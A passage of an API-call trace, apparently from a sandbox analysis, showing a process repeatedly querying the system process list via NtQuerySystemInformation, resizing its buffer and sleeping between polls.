SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.455] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.465] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.475] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.484] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.493] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.501] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.510] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.518] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.528] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.536] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.545] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.554] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.563] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.575] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.583] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.601] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.609] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.620] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.629] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 